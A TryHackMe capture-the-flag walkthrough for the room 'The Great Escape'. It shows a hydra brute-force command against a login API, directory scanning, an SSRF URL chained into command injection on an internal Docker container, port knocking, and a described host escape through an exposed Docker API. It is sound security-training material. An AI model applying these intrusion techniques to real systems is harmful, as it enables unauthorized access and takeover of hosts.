The Great Escape Tryhackme Writeup
By Shamsher khan This is a Writeup of Tryhackme room “The Great Escape”
Room link: https://tryhackme.com/room/malstrings
Note: This room is free
Docker, Networks, and Container Escapes; Oh My!
I wanted to explore the concept of a Docker Escape. Docker is an extremely useful tool which allows us to isolate applications from each other and the host OS without having to resort to virtual machines. Properly configured it can be very secure, though miscommunications can introduce massive security holes, which we shall soon see.
Enumeration
Let’s take a look at the web server for now.
On the homepage, we see an admin section. Clicking into it there’s a login form. Trying something like admin:password calls an api which returns a 401: Unauthorized response. Moreover, trying to register a new user throws an error saying signups are disabled.
Perhaps we can brute force the login?
Brute Force Login
hydra -l admin -P /usr/share/wordlists/rockyou.txt 'http-post://$TARGET_IP/api/login/:{"username"\:"^USER^","password"\:"^PASS^"}:H=Content-Type\:application/json:F=ERROR'Getting a lot of 503 errors
Directory Scanning
Hint is indicate the file name is “well known” create wordlist
wellknown
well-known
.well-known
.wellknown
WELLKNOWN
Wellknown
WEllknown
WeLlknwn
WELLknown
......
......
etcGobuster
So this means that everything we try returns a 200 status.
Armed with this information, we know that 200 response codes are bad, but other response codes (such as a 302) maybe indicate a directory is present. Let’s rerun our Gobuster command, but we’ll specify which response codes we want returned.
Checking the help page, we can see that Gobuster accepts the following response codes; “200,204,301,302,307,401,403”.
Remove status code 200
gobuster dir -u http://10.10.211.97/ -w /usr/share/wordlists/dirb/common.txt -s "204,301,302,307,401,403"
Gobuster didn’t work on http://10.10.207.227/.well-known
so we try dirb
So here we found security.txt file
Using curl, we can get the first flag:
Another common file on servers is the robots.txt file. Our nmap scan showed us the presence of this file with a few disallowed entries, let’s take a closer look:
We already know about the api route, but what’s this exif-util thing? Let’s take a look:
The upload functionality did not helped much.
From URL Checking if the URL parameter is vulnerable to SSRF
Port 8080 was found by brute forcing common ports.
The url called a new route
/api/exif?url=http:%2F%2F127.0.0.1:8080This also did not lead me to any where so not the another entry in the robots file can be used
/*.bak.txt
I bruteforced the for the well known files and found
exif-util.bak.txt
Now we found a new host api-dev-backup which should be a docker container. Since this is a development backup I tried different injection techniques. At last found a command injection
http://10.10.193.190/api/exif?url=http://api-dev-backup:8080/exif?url=/etc/passwd
Banned words which means there must be some filter going on
Let’s try other commands
Which means something is running. it read id command as file name . Lets try other payloads
And we successfully executed the command. We are root, but just on the docker container.
I tried to get a reverse shell but was unsuccessful. It looks like the all the outgoing traffic is blocked by the firewall. So, I manually started going through the container.
here we found git Let’s enumerate this
We can see that are three commits. So, lets check those out.
We found root Flag
Just knock on port 42,1337,10420,6969,63000
the default docker port is 2375 Let’s check if it is or not
The next 2 steps I give might be unnecessary but I did it anyways where I added the machine IP with the docker port to tell docker to trust this instance and then restarted it
sudo vim /etc/docker/daemon.json
I restarted my docker service by stopping it and then starting it again after waiting for at least 30 seconds.
sudo systemctl stop docker
<Wait 30 seconds>
sudo systemctl start docker
We can successfully list the docker images using the API.
Getting root shell
Here I have created a container from frontend image on an interactive mode executing sh binary. The root file system of the host will be mounted on the /mnt directory of the container and the root of the container is changed to /mnt.
You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher
For more walkthroughs stay tuned…
Before you go…
Visit my other walkthrough’s:-
and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!
